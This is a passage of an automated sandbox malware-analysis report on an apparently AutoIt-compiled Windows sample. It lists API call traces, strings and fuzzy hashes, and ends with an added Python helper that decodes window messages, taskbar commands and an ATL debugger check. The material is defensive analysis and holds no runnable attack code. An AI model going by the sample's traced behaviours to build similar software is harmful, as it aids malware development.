                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          APIs
                                            • Part of subcall function 00904F0B: __fread_nolock.LIBCMT ref: 00904F29
                                          • _wcscmp.LIBCMT ref: 00969824
                                          • _wcscmp.LIBCMT ref: 00969837
                                          Strings
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          APIs
                                          • _memset.LIBCMT ref: 0097259E
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009725D4
                                          Strings
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00987B61
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00987B76
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00986B17
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00986B53
                                          Strings
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          APIs
                                          • _memset.LIBCMT ref: 00962911
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0096294C
                                          Strings
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • __snwprintf.LIBCMT ref: 00973A66
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          Strings
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00986761
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098676C
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00986C71
                                          • GetSysColor.USER32(00000012), ref: 00986C8B
                                          Strings
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 009869A2
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009869B1
                                          Strings
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          APIs
                                          • _memset.LIBCMT ref: 00962A22
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00962A41
                                          Strings
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0097222C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00972255
                                          Strings
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00958E73
                                          Strings
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 5641bcdfc9267c21821f2a8957016898fbe158a5ed90438b7aa1d51943ce65c8
                                          • Instruction ID: 3f0e587211f13b185aca36401e153cdac5500341a98600fa35bdd4622efa4dc9
                                          • Opcode Fuzzy Hash: 5641bcdfc9267c21821f2a8957016898fbe158a5ed90438b7aa1d51943ce65c8
                                          • Instruction Fuzzy Hash: F801F9718042287EDB18CAA8D816FFE7BFCDB15311F00459AF552D21C1E874E6088760
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00958D6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 89a24dbde06a5f41452e8d4a72cdfaeb5bbb0bdc1c913ab613d25b50049a8e86
                                          • Instruction ID: 0de6a38f2ee638b479db12d0840ff903f84a823676eef5bb3bdc81c6b3abd098
                                          • Opcode Fuzzy Hash: 89a24dbde06a5f41452e8d4a72cdfaeb5bbb0bdc1c913ab613d25b50049a8e86
                                          • Instruction Fuzzy Hash: 0801BCB1A41108AFCF14EBE2C992BFFB3A89F95351F100529B806772E1DE245A0C9761
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00958DEE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 962e4b45fdf712be20837b7ab90df768d2d7ece2deea1ffe3b8679deaf3cf6e7
                                          • Instruction ID: c79fa98cda81a4f2c85b0e05369c5d90e09e908c5b136d7650fc3462c2fde63d
                                          • Opcode Fuzzy Hash: 962e4b45fdf712be20837b7ab90df768d2d7ece2deea1ffe3b8679deaf3cf6e7
                                          • Instruction Fuzzy Hash: 3301DBB1A41108ABDF10EAE6CA82BFFB3AC8B51311F100525BC06B32D2DA255E0CE771
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 06750b858170b4fad51fc3d960e9e43d4c9a4518dfcfd4bb98a0b2385a18758f
                                          • Instruction ID: 5d3894d548089db12505c79676c526d5d813874a22009e89f7b7c1bd352620f9
                                          • Opcode Fuzzy Hash: 06750b858170b4fad51fc3d960e9e43d4c9a4518dfcfd4bb98a0b2385a18758f
                                          • Instruction Fuzzy Hash: 09E0D832A042382BE7209B99AC49FA7F7ACEB95B70F100067FD04D7151D960AA45C7E0
                                          APIs
                                            • Part of subcall function 0093B314: _memset.LIBCMT ref: 0093B321
                                            • Part of subcall function 00920940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0093B2F0,?,?,?,0090100A), ref: 00920945
                                          • IsDebuggerPresent.KERNEL32(?,?,?,0090100A), ref: 0093B2F4
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0090100A), ref: 0093B303
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0093B2FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 69870386a86b50a65b09e9999911584b40cb17b81fb430370a8164407b57d1d9
                                          • Instruction ID: c6e394038b1e28021777f3380d39f53217bc088a7c3b0fb0471e72f7c8fa8a67
                                          • Opcode Fuzzy Hash: 69870386a86b50a65b09e9999911584b40cb17b81fb430370a8164407b57d1d9
                                          • Instruction Fuzzy Hash: 70E092702147218FD730EF28E4047467BE8AF80304F10892DE456C7341EBB4E488CFA1
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00957C82
                                            • Part of subcall function 00923358: _doexit.LIBCMT ref: 00923362
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: bf1e553a284e303be3e91a67def4ee6b897302889be70df0137da9ef3dd5115b
                                          • Instruction ID: 3186264fb52c3f29d3f4b8b043fe8c1f618b0d317d88d67c84e76fb5deded049
                                          • Opcode Fuzzy Hash: bf1e553a284e303be3e91a67def4ee6b897302889be70df0137da9ef3dd5115b
                                          • Instruction Fuzzy Hash: E8D0123238832836D21572A9BD06BCA76484B85B56F144415BB48596D349D5458052A5
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00941775
                                            • Part of subcall function 0097BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0094195E,?), ref: 0097BFFE
                                            • Part of subcall function 0097BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0097C010
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0094196D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                          • String ID: WIN_XPe
                                          • API String ID: 582185067-3257408948
                                          • Opcode ID: 06f060e47c729ae3de6fdfd1612dccf691d2339ad1b502091cd8bf7575172f3c
                                          • Instruction ID: 8abf2371831c55dbfad60e7f8e7958641b744aa5ed1c9d1037c3dcf157f74fa8
                                          • Opcode Fuzzy Hash: 06f060e47c729ae3de6fdfd1612dccf691d2339ad1b502091cd8bf7575172f3c
                                          • Instruction Fuzzy Hash: A9F06D71814009DFCB15DB90C998FECBBF8BB08300F600496E112A21A0C7355F84EF20
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009859AE
                                          • PostMessageW.USER32(00000000), ref: 009859B5
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 7b7dc05779de08512c8705588484eff7c8d5a24d84a23580882363dd64dd5b49
                                          • Instruction ID: 6063aee5549b9efed2db12eea9d061e53289d423bf0334136d1e30dfe72d4726
                                          • Opcode Fuzzy Hash: 7b7dc05779de08512c8705588484eff7c8d5a24d84a23580882363dd64dd5b49
                                          • Instruction Fuzzy Hash: 17D0C9313943117AE664BB70DC1BFD76614AB44B50F011825B255AA2D0D9E0A800D754
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0098596E
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00985981
                                            • Part of subcall function 00965244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 74a22da7a882b7690eec58dc22369eb29b2828a171d0dcdbf5d1a75e12338529
                                          • Instruction ID: d2e544b9e12befa21a9ea06973dcbb480f368ef298b7fd68f9c418393d639561
                                          • Opcode Fuzzy Hash: 74a22da7a882b7690eec58dc22369eb29b2828a171d0dcdbf5d1a75e12338529
                                          • Instruction Fuzzy Hash: BCD0C931398311B6E664BB70DC2BFE76A14AB44B50F011825B259AA2D0D9E0A800D754
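The API traces in the function records above show window messages and command identifiers only as raw hex (00000180, 00000182, 00000111, 00000197), and the IsDebuggerPresent/OutputDebugStringW pair is reported without saying where it comes from. The Python helper below is an added example, not part of the Joe Sandbox report and not code from the sample; it decodes trace lines of this section into symbolic names using the winuser.h message values (LB_ADDSTRING 0x180, LB_DELETESTRING 0x182, WM_COMMAND 0x111), the WM_COMMAND identifiers the Shell_TrayWnd taskbar window accepts (407 toggle desktop, 416 undo minimize all, 419 minimize all), and the fact that the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is emitted by the ATL runtime's CAtlBaseModule constructor, so that debugger check is library boilerplate rather than a check written by the sample's author. The sample lines embedded in it are copied from this section; the regex assumes the "API.MODULE(args), ref: addr" line shape shown here, and arguments printed as "?" are ones the sandbox did not resolve.

```python
import re
from dataclasses import dataclass, field

# Window messages from winuser.h; only the values that occur in this report section.
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0143: "CB_ADDSTRING",
    0x0144: "CB_DELETESTRING",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
}

# WM_COMMAND identifiers handled by the taskbar window (class Shell_TrayWnd).
TRAY_COMMANDS = {
    407: "TOGGLE_DESKTOP",
    416: "MIN_ALL_UNDO",
    419: "MIN_ALL",
}

# Debug string from the ATL runtime's CAtlBaseModule constructor (atlcore.h). The
# IsDebuggerPresent / OutputDebugStringW pair around it is library code, not a
# custom anti-debugging check.
ATL_BASEMODULE_MSG = "ERROR : Unable to initialize critical section in CAtlBaseModule"

# Joe Sandbox trace line: optional bullet, optional "Part of subcall function X:",
# then API.MODULE(arg,arg,...), ref: ADDR
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    note: str = ""


def parse_arg(raw):
    """Resolved integers are printed as 8 hex digits, unresolved ones as '?';
    anything else is a string literal (string args containing commas would be
    split by the caller, which this example does not try to repair)."""
    raw = raw.strip()
    if raw == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw


def decode_trace(lines):
    """Parse trace lines in order and attach a symbolic note to each call.
    Non-trace lines (headings, dump-source lines) are skipped."""
    calls = []
    last_window_class = None  # class name of the most recent FindWindowW target
    for line in lines:
        m = TRACE_RE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        call = Call(m["api"], m["module"], args, m["ref"].upper())
        if call.api == "FindWindowW" and args and isinstance(args[0], str):
            last_window_class = args[0]
            call.note = f"looks up top-level window of class {args[0]}"
        elif call.api in ("SendMessageW", "PostMessageW") and len(args) > 1 and isinstance(args[1], int):
            msg = args[1]
            call.note = WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")
            if (call.note == "WM_COMMAND" and last_window_class == "Shell_TrayWnd"
                    and len(args) > 2 and isinstance(args[2], int)):
                call.note += " to Shell_TrayWnd, id %d = %s" % (
                    args[2], TRAY_COMMANDS.get(args[2], "unknown"))
        elif call.api == "OutputDebugStringW" and args and args[0] == ATL_BASEMODULE_MSG:
            call.note = "ATL CAtlBaseModule constructor; runtime boilerplate, not custom anti-debug"
        calls.append(call)
    return calls


# Constructed input: trace lines copied from the function records in this section.
SAMPLE_TRACE = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0098596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00985981
  • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00958D6B
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00958DEE
• IsDebuggerPresent.KERNEL32(?,?,?,0090100A), ref: 0093B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0090100A), ref: 0093B303
""".strip().splitlines()

if __name__ == "__main__":
    for c in decode_trace(SAMPLE_TRACE):
        print(f"{c.ref}  {c.api}.{c.module}  {c.note}")
```

The tray decoding is only attached when the preceding FindWindowW in the same trace targeted Shell_TrayWnd, because WM_COMMAND identifiers are specific to the receiving window; the second Shell_TrayWnd function in this section has its PostMessageW arguments unresolved, so it gets no identifier note.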